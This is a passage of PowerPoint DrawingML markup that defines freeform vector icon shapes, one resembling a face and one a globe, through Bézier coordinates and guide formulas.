                      <a:pt x="17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20" y="8"/>
                      <a:pt x="22" y="9"/>
                      <a:pt x="23" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="13"/>
                      <a:pt x="28" y="18"/>
                      <a:pt x="30" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="23"/>
                      <a:pt x="30" y="24"/>
                      <a:pt x="30" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="24"/>
                      <a:pt x="29" y="24"/>
                      <a:pt x="29" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="22"/>
                      <a:pt x="19" y="20"/>
                      <a:pt x="17" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="16"/>
                      <a:pt x="14" y="14"/>
                      <a:pt x="14" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="78"/>
                    </a:move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32" y="44"/>
                      <a:pt x="32" y="44"/>
                      <a:pt x="32" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="78"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="41"/>
                      <a:pt x="6" y="41"/>
                      <a:pt x="6" y="4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32" y="31"/>
                      <a:pt x="32" y="31"/>
                      <a:pt x="32" y="31"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="78"/>
                    </a:move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44"/>
                      <a:pt x="42" y="44"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="44"/>
                      <a:pt x="63" y="44"/>
                      <a:pt x="63" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63" y="78"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="69" y="41"/>
                    </a:move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31"/>
                      <a:pt x="42" y="31"/>
                      <a:pt x="42" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="31"/>
                      <a:pt x="69" y="31"/>
                      <a:pt x="69" y="31"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="69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3" name="Freeform 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD887E42-0280-499E-A306-56C475AC0A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06584" y="4526927"/>
                <a:ext cx="246623" cy="201604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 77"/>
                  <a:gd name="T1" fmla="*/ 42 h 63"/>
                  <a:gd name="T2" fmla="*/ 8 w 77"/>
                  <a:gd name="T3" fmla="*/ 55 h 63"/>
                  <a:gd name="T4" fmla="*/ 21 w 77"/>
                  <a:gd name="T5" fmla="*/ 61 h 63"/>
                  <a:gd name="T6" fmla="*/ 38 w 77"/>
                  <a:gd name="T7" fmla="*/ 63 h 63"/>
                  <a:gd name="T8" fmla="*/ 56 w 77"/>
                  <a:gd name="T9" fmla="*/ 61 h 63"/>
                  <a:gd name="T10" fmla="*/ 69 w 77"/>
                  <a:gd name="T11" fmla="*/ 55 h 63"/>
                  <a:gd name="T12" fmla="*/ 76 w 77"/>
                  <a:gd name="T13" fmla="*/ 42 h 63"/>
                  <a:gd name="T14" fmla="*/ 71 w 77"/>
                  <a:gd name="T15" fmla="*/ 16 h 63"/>
                  <a:gd name="T16" fmla="*/ 72 w 77"/>
                  <a:gd name="T17" fmla="*/ 11 h 63"/>
                  <a:gd name="T18" fmla="*/ 70 w 77"/>
                  <a:gd name="T19" fmla="*/ 0 h 63"/>
                  <a:gd name="T20" fmla="*/ 67 w 77"/>
                  <a:gd name="T21" fmla="*/ 0 h 63"/>
                  <a:gd name="T22" fmla="*/ 60 w 77"/>
                  <a:gd name="T23" fmla="*/ 3 h 63"/>
                  <a:gd name="T24" fmla="*/ 38 w 77"/>
                  <a:gd name="T25" fmla="*/ 5 h 63"/>
                  <a:gd name="T26" fmla="*/ 17 w 77"/>
                  <a:gd name="T27" fmla="*/ 3 h 63"/>
                  <a:gd name="T28" fmla="*/ 9 w 77"/>
                  <a:gd name="T29" fmla="*/ 0 h 63"/>
                  <a:gd name="T30" fmla="*/ 7 w 77"/>
                  <a:gd name="T31" fmla="*/ 0 h 63"/>
                  <a:gd name="T32" fmla="*/ 5 w 77"/>
                  <a:gd name="T33" fmla="*/ 11 h 63"/>
                  <a:gd name="T34" fmla="*/ 6 w 77"/>
                  <a:gd name="T35" fmla="*/ 16 h 63"/>
                  <a:gd name="T36" fmla="*/ 9 w 77"/>
                  <a:gd name="T37" fmla="*/ 42 h 63"/>
                  <a:gd name="T38" fmla="*/ 18 w 77"/>
                  <a:gd name="T39" fmla="*/ 30 h 63"/>
                  <a:gd name="T40" fmla="*/ 27 w 77"/>
                  <a:gd name="T41" fmla="*/ 29 h 63"/>
                  <a:gd name="T42" fmla="*/ 38 w 77"/>
                  <a:gd name="T43" fmla="*/ 30 h 63"/>
                  <a:gd name="T44" fmla="*/ 49 w 77"/>
                  <a:gd name="T45" fmla="*/ 29 h 63"/>
                  <a:gd name="T46" fmla="*/ 59 w 77"/>
                  <a:gd name="T47" fmla="*/ 30 h 63"/>
                  <a:gd name="T48" fmla="*/ 67 w 77"/>
                  <a:gd name="T49" fmla="*/ 42 h 63"/>
                  <a:gd name="T50" fmla="*/ 64 w 77"/>
                  <a:gd name="T51" fmla="*/ 52 h 63"/>
                  <a:gd name="T52" fmla="*/ 56 w 77"/>
                  <a:gd name="T53" fmla="*/ 57 h 63"/>
                  <a:gd name="T54" fmla="*/ 45 w 77"/>
                  <a:gd name="T55" fmla="*/ 58 h 63"/>
                  <a:gd name="T56" fmla="*/ 31 w 77"/>
                  <a:gd name="T57" fmla="*/ 58 h 63"/>
                  <a:gd name="T58" fmla="*/ 20 w 77"/>
                  <a:gd name="T59" fmla="*/ 57 h 63"/>
                  <a:gd name="T60" fmla="*/ 12 w 77"/>
                  <a:gd name="T61" fmla="*/ 52 h 63"/>
                  <a:gd name="T62" fmla="*/ 9 w 77"/>
                  <a:gd name="T63" fmla="*/ 42 h 63"/>
                  <a:gd name="T64" fmla="*/ 53 w 77"/>
                  <a:gd name="T65" fmla="*/ 48 h 63"/>
                  <a:gd name="T66" fmla="*/ 53 w 77"/>
                  <a:gd name="T67" fmla="*/ 34 h 63"/>
                  <a:gd name="T68" fmla="*/ 19 w 77"/>
                  <a:gd name="T69" fmla="*/ 41 h 63"/>
                  <a:gd name="T70" fmla="*/ 29 w 77"/>
                  <a:gd name="T71" fmla="*/ 41 h 63"/>
                  <a:gd name="T72" fmla="*/ 19 w 77"/>
                  <a:gd name="T73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" h="63">
                    <a:moveTo>
                      <a:pt x="0" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="39"/>
                      <a:pt x="1" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="45"/>
                      <a:pt x="2" y="47"/>
                      <a:pt x="3" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="51"/>
                      <a:pt x="6" y="53"/>
                      <a:pt x="8" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="56"/>
                      <a:pt x="12" y="58"/>
                      <a:pt x="14" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="60"/>
                      <a:pt x="18" y="61"/>
                      <a:pt x="21" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="62"/>
                      <a:pt x="26" y="62"/>
                      <a:pt x="29" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="63"/>
                      <a:pt x="35" y="63"/>
                      <a:pt x="38" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="63"/>
                      <a:pt x="45" y="63"/>
                      <a:pt x="47" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="62"/>
                      <a:pt x="53" y="62"/>
                      <a:pt x="56" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="61"/>
                      <a:pt x="61" y="60"/>
                      <a:pt x="63" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="58"/>
                      <a:pt x="67" y="56"/>
                      <a:pt x="69" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="53"/>
                      <a:pt x="72" y="51"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="47"/>
                      <a:pt x="75" y="45"/>
                      <a:pt x="76" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="39"/>
                      <a:pt x="77" y="36"/>
                      <a:pt x="77" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="26"/>
                      <a:pt x="75" y="21"/>
                      <a:pt x="71" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="16"/>
                      <a:pt x="71" y="15"/>
                      <a:pt x="71" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="13"/>
                      <a:pt x="72" y="12"/>
                      <a:pt x="72" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="10"/>
                      <a:pt x="72" y="8"/>
                      <a:pt x="72" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="4"/>
                      <a:pt x="71" y="2"/>
                      <a:pt x="70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0"/>
                      <a:pt x="68" y="0"/>
                      <a:pt x="67" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="0"/>
                      <a:pt x="65" y="1"/>
                      <a:pt x="64" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="1"/>
                      <a:pt x="61" y="2"/>
                      <a:pt x="60" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="4"/>
                      <a:pt x="56" y="5"/>
                      <a:pt x="53" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="6"/>
                      <a:pt x="45" y="5"/>
                      <a:pt x="38" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="5"/>
                      <a:pt x="27" y="6"/>
                      <a:pt x="23" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="5"/>
                      <a:pt x="19" y="4"/>
                      <a:pt x="17" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="2"/>
                      <a:pt x="14" y="1"/>
                      <a:pt x="12" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="1"/>
                      <a:pt x="10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4"/>
                      <a:pt x="5" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="10"/>
                      <a:pt x="5" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="12"/>
                      <a:pt x="5" y="13"/>
                      <a:pt x="5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2" y="21"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="33"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="38"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="14" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="31"/>
                      <a:pt x="16" y="30"/>
                      <a:pt x="18" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="30"/>
                      <a:pt x="20" y="29"/>
                      <a:pt x="22" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="29"/>
                      <a:pt x="25" y="29"/>
                      <a:pt x="27" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="29"/>
                      <a:pt x="30" y="29"/>
                      <a:pt x="32" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="30"/>
                      <a:pt x="36" y="30"/>
                      <a:pt x="38" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="30"/>
                      <a:pt x="42" y="30"/>
                      <a:pt x="44" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="29"/>
                      <a:pt x="48" y="29"/>
                      <a:pt x="49" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="29"/>
                      <a:pt x="52" y="29"/>
                      <a:pt x="54" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="29"/>
                      <a:pt x="57" y="30"/>
                      <a:pt x="59" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="30"/>
                      <a:pt x="61" y="31"/>
                      <a:pt x="62" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="35"/>
                      <a:pt x="67" y="38"/>
                      <a:pt x="67" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="44"/>
                      <a:pt x="67" y="46"/>
                      <a:pt x="66" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="49"/>
                      <a:pt x="65" y="51"/>
                      <a:pt x="64" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="53"/>
                      <a:pt x="62" y="54"/>
                      <a:pt x="61" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="56"/>
                      <a:pt x="58" y="56"/>
                      <a:pt x="56" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="57"/>
                      <a:pt x="53" y="57"/>
                      <a:pt x="51" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="58"/>
                      <a:pt x="46" y="58"/>
                      <a:pt x="45" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="58"/>
                      <a:pt x="41" y="58"/>
                      <a:pt x="38" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="58"/>
                      <a:pt x="33" y="58"/>
                      <a:pt x="31" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="58"/>
                      <a:pt x="28" y="58"/>
                      <a:pt x="25" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="57"/>
                      <a:pt x="21" y="57"/>
                      <a:pt x="20" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="56"/>
                      <a:pt x="17" y="56"/>
                      <a:pt x="16" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="54"/>
                      <a:pt x="13" y="53"/>
                      <a:pt x="12" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="51"/>
                      <a:pt x="11" y="49"/>
                      <a:pt x="10" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="46"/>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="42"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="48" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="45"/>
                      <a:pt x="50" y="48"/>
                      <a:pt x="53" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="48"/>
                      <a:pt x="58" y="45"/>
                      <a:pt x="58" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="37"/>
                      <a:pt x="55" y="34"/>
                      <a:pt x="53" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="34"/>
                      <a:pt x="48" y="37"/>
                      <a:pt x="48" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="19" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="45"/>
                      <a:pt x="21" y="48"/>
                      <a:pt x="24" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="48"/>
                      <a:pt x="29" y="45"/>
                      <a:pt x="29" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="37"/>
                      <a:pt x="27" y="34"/>
                      <a:pt x="24" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="34"/>
                      <a:pt x="19" y="37"/>
                      <a:pt x="1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4" name="Freeform 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85CF2D96-AFD0-48CF-BF1F-06AA1FA300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54088" y="1900192"/>
                <a:ext cx="401253" cy="401252"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 125"/>
                  <a:gd name="T1" fmla="*/ 63 h 125"/>
                  <a:gd name="T2" fmla="*/ 125 w 125"/>
                  <a:gd name="T3" fmla="*/ 63 h 125"/>
                  <a:gd name="T4" fmla="*/ 98 w 125"/>
                  <a:gd name="T5" fmla="*/ 83 h 125"/>
                  <a:gd name="T6" fmla="*/ 117 w 125"/>
                  <a:gd name="T7" fmla="*/ 67 h 125"/>
                  <a:gd name="T8" fmla="*/ 98 w 125"/>
                  <a:gd name="T9" fmla="*/ 83 h 125"/>
                  <a:gd name="T10" fmla="*/ 25 w 125"/>
                  <a:gd name="T11" fmla="*/ 59 h 125"/>
                  <a:gd name="T12" fmla="*/ 13 w 125"/>
                  <a:gd name="T13" fmla="*/ 42 h 125"/>
                  <a:gd name="T14" fmla="*/ 90 w 125"/>
                  <a:gd name="T15" fmla="*/ 42 h 125"/>
                  <a:gd name="T16" fmla="*/ 67 w 125"/>
                  <a:gd name="T17" fmla="*/ 59 h 125"/>
                  <a:gd name="T18" fmla="*/ 90 w 125"/>
                  <a:gd name="T19" fmla="*/ 42 h 125"/>
                  <a:gd name="T20" fmla="*/ 67 w 125"/>
                  <a:gd name="T21" fmla="*/ 9 h 125"/>
                  <a:gd name="T22" fmla="*/ 82 w 125"/>
                  <a:gd name="T23" fmla="*/ 23 h 125"/>
                  <a:gd name="T24" fmla="*/ 67 w 125"/>
                  <a:gd name="T25" fmla="*/ 34 h 125"/>
                  <a:gd name="T26" fmla="*/ 53 w 125"/>
                  <a:gd name="T27" fmla="*/ 12 h 125"/>
                  <a:gd name="T28" fmla="*/ 59 w 125"/>
                  <a:gd name="T29" fmla="*/ 34 h 125"/>
                  <a:gd name="T30" fmla="*/ 43 w 125"/>
                  <a:gd name="T31" fmla="*/ 23 h 125"/>
                  <a:gd name="T32" fmla="*/ 59 w 125"/>
                  <a:gd name="T33" fmla="*/ 59 h 125"/>
                  <a:gd name="T34" fmla="*/ 36 w 125"/>
                  <a:gd name="T35" fmla="*/ 42 h 125"/>
                  <a:gd name="T36" fmla="*/ 13 w 125"/>
                  <a:gd name="T37" fmla="*/ 83 h 125"/>
                  <a:gd name="T38" fmla="*/ 25 w 125"/>
                  <a:gd name="T39" fmla="*/ 67 h 125"/>
                  <a:gd name="T40" fmla="*/ 13 w 125"/>
                  <a:gd name="T41" fmla="*/ 83 h 125"/>
                  <a:gd name="T42" fmla="*/ 59 w 125"/>
                  <a:gd name="T43" fmla="*/ 67 h 125"/>
                  <a:gd name="T44" fmla="*/ 36 w 125"/>
                  <a:gd name="T45" fmla="*/ 83 h 125"/>
                  <a:gd name="T46" fmla="*/ 59 w 125"/>
                  <a:gd name="T47" fmla="*/ 92 h 125"/>
                  <a:gd name="T48" fmla="*/ 53 w 125"/>
                  <a:gd name="T49" fmla="*/ 113 h 125"/>
                  <a:gd name="T50" fmla="*/ 38 w 125"/>
                  <a:gd name="T51" fmla="*/ 92 h 125"/>
                  <a:gd name="T52" fmla="*/ 82 w 125"/>
                  <a:gd name="T53" fmla="*/ 102 h 125"/>
                  <a:gd name="T54" fmla="*/ 67 w 125"/>
                  <a:gd name="T55" fmla="*/ 116 h 125"/>
                  <a:gd name="T56" fmla="*/ 87 w 125"/>
                  <a:gd name="T57" fmla="*/ 92 h 125"/>
                  <a:gd name="T58" fmla="*/ 67 w 125"/>
                  <a:gd name="T59" fmla="*/ 83 h 125"/>
                  <a:gd name="T60" fmla="*/ 92 w 125"/>
                  <a:gd name="T61" fmla="*/ 67 h 125"/>
                  <a:gd name="T62" fmla="*/ 67 w 125"/>
                  <a:gd name="T63" fmla="*/ 83 h 125"/>
                  <a:gd name="T64" fmla="*/ 98 w 125"/>
                  <a:gd name="T65" fmla="*/ 42 h 125"/>
                  <a:gd name="T66" fmla="*/ 117 w 125"/>
                  <a:gd name="T67" fmla="*/ 59 h 125"/>
                  <a:gd name="T68" fmla="*/ 108 w 125"/>
                  <a:gd name="T69" fmla="*/ 34 h 125"/>
                  <a:gd name="T70" fmla="*/ 86 w 125"/>
                  <a:gd name="T71" fmla="*/ 14 h 125"/>
                  <a:gd name="T72" fmla="*/ 108 w 125"/>
                  <a:gd name="T73" fmla="*/ 34 h 125"/>
                  <a:gd name="T74" fmla="*/ 39 w 125"/>
                  <a:gd name="T75" fmla="*/ 14 h 125"/>
                  <a:gd name="T76" fmla="*/ 17 w 125"/>
                  <a:gd name="T77" fmla="*/ 34 h 125"/>
                  <a:gd name="T78" fmla="*/ 17 w 125"/>
                  <a:gd name="T79" fmla="*/ 92 h 125"/>
                  <a:gd name="T80" fmla="*/ 39 w 125"/>
                  <a:gd name="T81" fmla="*/ 111 h 125"/>
                  <a:gd name="T82" fmla="*/ 17 w 125"/>
                  <a:gd name="T83" fmla="*/ 92 h 125"/>
                  <a:gd name="T84" fmla="*/ 86 w 125"/>
                  <a:gd name="T85" fmla="*/ 111 h 125"/>
                  <a:gd name="T86" fmla="*/ 108 w 125"/>
                  <a:gd name="T87" fmla="*/ 9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5" h="125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7"/>
                      <a:pt x="28" y="125"/>
                      <a:pt x="63" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="125"/>
                      <a:pt x="125" y="97"/>
                      <a:pt x="125" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="28"/>
                      <a:pt x="97" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="98" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="78"/>
                      <a:pt x="100" y="73"/>
                      <a:pt x="100" y="67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6" y="73"/>
                      <a:pt x="115" y="78"/>
                      <a:pt x="113" y="83"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="98" y="83"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="27" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="47"/>
                      <a:pt x="26" y="53"/>
                      <a:pt x="25" y="59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53"/>
                      <a:pt x="11" y="47"/>
                      <a:pt x="13" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="27" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="90" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="47"/>
                      <a:pt x="92" y="53"/>
                      <a:pt x="92" y="59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67" y="42"/>
                      <a:pt x="67" y="42"/>
                      <a:pt x="67" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="90" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="9"/>
                      <a:pt x="67" y="9"/>
                      <a:pt x="67" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="10"/>
                      <a:pt x="71" y="11"/>
                      <a:pt x="73" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="14"/>
                      <a:pt x="79" y="18"/>
                      <a:pt x="82" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="26"/>
                      <a:pt x="86" y="30"/>
                      <a:pt x="87" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="34"/>
                      <a:pt x="67" y="34"/>
                      <a:pt x="67" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="18"/>
                      <a:pt x="50" y="14"/>
                      <a:pt x="53" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="11"/>
                      <a:pt x="57" y="10"/>
                      <a:pt x="59" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="34"/>
                      <a:pt x="59" y="34"/>
                      <a:pt x="59" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="34"/>
                      <a:pt x="38" y="34"/>
                      <a:pt x="38" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="30"/>
                      <a:pt x="41" y="26"/>
                      <a:pt x="43" y="23"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="59" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="59"/>
                      <a:pt x="59" y="59"/>
                      <a:pt x="59" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="59"/>
                      <a:pt x="34" y="59"/>
                      <a:pt x="34" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="53"/>
                      <a:pt x="35" y="47"/>
                      <a:pt x="36" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="59" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="78"/>
                      <a:pt x="9" y="73"/>
                      <a:pt x="9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6" y="73"/>
                      <a:pt x="26" y="78"/>
                      <a:pt x="27" y="83"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13" y="83"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="67"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="67"/>
                      <a:pt x="59" y="67"/>
                      <a:pt x="59" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="83"/>
                      <a:pt x="59" y="83"/>
                      <a:pt x="59" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="83"/>
                      <a:pt x="36" y="83"/>
                      <a:pt x="36" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="78"/>
                      <a:pt x="34" y="73"/>
                      <a:pt x="34" y="67"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="59" y="92"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="116"/>
                      <a:pt x="59" y="116"/>
                      <a:pt x="59" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="116"/>
                      <a:pt x="55" y="115"/>
                      <a:pt x="53" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="111"/>
                      <a:pt x="46" y="107"/>
                      <a:pt x="43" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="99"/>
                      <a:pt x="40" y="96"/>
                      <a:pt x="38" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="92"/>
                      <a:pt x="59" y="92"/>
                      <a:pt x="59" y="92"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="82" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="107"/>
